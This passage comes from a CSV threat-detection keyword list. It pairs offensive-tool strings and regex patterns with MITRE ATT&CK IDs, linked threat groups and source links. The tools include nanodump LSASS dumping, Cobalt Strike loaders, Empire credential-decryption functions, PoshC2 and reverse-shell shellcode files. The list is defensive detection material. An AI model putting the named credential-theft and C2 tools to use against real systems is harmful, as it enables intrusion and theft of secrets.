user*",".{0,1000}Load\sthe\spasswords\sof\sthe\scurrent\slogged\-on\suser.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. 
or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51167" "*load_credentials(""credentials.txt"")*",".{0,1000}load_credentials\(\""credentials\.txt\""\).{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","N/A","6","","N/A","","","","51168" "*load_sc.exe *.bin*",".{0,1000}load_sc\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - 
Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","0","N/A","N/A","10","10","193","28","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z","51169" "*load_ssp *.dll*",".{0,1000}load_ssp\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","51170" "*load_ssp.x64.exe *.dll*",".{0,1000}load_ssp\.x64\.exe\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","51171" "*Load-BeaconParameters*",".{0,1000}Load\-BeaconParameters.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","51172" "*Load-BetterXencrypt* 
",".{0,1000}Load\-BetterXencrypt.{0,1000}\s","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","51173" "*Load-Bof(*",".{0,1000}Load\-Bof\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","N/A","10","10","250","35","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z","51174" "*loaddll64.exe*",".{0,1000}loaddll64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51175" "*loader.x64.exe.exe*",".{0,1000}loader\.x64\.exe\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","51176" "*loader/inject.c*",".{0,1000}loader\/inject\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","51177" "*loader/inject_local.c*",".{0,1000}loader\/inject_local\.c.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","51178" "*loader/loader/loader.c*",".{0,1000}loader\/loader\/loader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","51179" "*loader_exe_x64.*",".{0,1000}loader_exe_x64\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","51180" "*loader_exe_x86.*",".{0,1000}loader_exe_x86\..{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","51181" "*Loader'z WEB shell*",".{0,1000}Loader\'z\sWEB\sshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","51182" "*LoadEWSDLL*",".{0,1000}LoadEWSDLL.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","51183" "*loadKirbiFile*",".{0,1000}loadKirbiFile.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","51184" "*loadliba_reverse_tcp.asm*",".{0,1000}loadliba_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","51185" "*loadliba_shell.asm*",".{0,1000}loadliba_shell\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","51186" "*loadliba_single_shell_reverse_tcp.asm*",".{0,1000}loadliba_single_shell_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","51187" "*loadmodule *.ps1*",".{0,1000}loadmodule\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","51188" "*loadmodume */modules/*.ps1**",".{0,1000}loadmodume\s.{0,1000}\/modules\/.{0,1000}\.ps1.{0,1000}.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","51189" "*Load-PSObfuscation*",".{0,1000}Load\-PSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script 
Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","51190" "*Load-PyFuscation*",".{0,1000}Load\-PyFuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","51191" "*local:Get-DecryptedCpassword*",".{0,1000}local\:Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51194" "*Local:Get-DecryptedSitelistPassword*",".{0,1000}Local\:Get\-DecryptedSitelistPassword.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51195" "*Local:Get-DelegateType*",".{0,1000}Local\:Get\-DelegateType.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51196" "*Local:Get-KeePassXMLFields*",".{0,1000}Local\:Get\-KeePassXMLFields.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - 
T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","51197" "*Local:Get-PEArchitecture*",".{0,1000}Local\:Get\-PEArchitecture.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","51198" "*Local:Get-ProcAddress*",".{0,1000}Local\:Get\-ProcAddress.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
